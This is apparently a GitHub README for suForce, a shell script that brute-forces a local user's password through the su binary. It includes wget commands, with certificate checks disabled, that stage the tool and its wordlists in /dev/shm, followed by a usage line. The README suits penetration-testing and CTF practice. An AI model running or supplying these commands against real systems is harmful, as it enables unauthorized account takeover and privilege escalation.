/suForce

suForce allows you to crack a user's password using brute force with the su binary.

Primary LanguageShellGNU General Public License v3.0GPL-3.0

suForce

suForce allows you to crack a user's password using brute force with the su binary.

  • Download suForce
cd /dev/shm
wget --no-check-certificate -q "https://raw.githubusercontent.com/d4t4s3c/suForce/main/suForce"
chmod +x suForce
  • Download Wordlist (Optional)
wget --no-check-certificate -q "https://raw.githubusercontent.com/d4t4s3c/suForce/main/techyou.txt"
wget --no-check-certificate -q "https://raw.githubusercontent.com/d4t4s3c/suForce/main/top12000.txt"
  • Usage
./suForce -u <USER> -w <WORDLIST>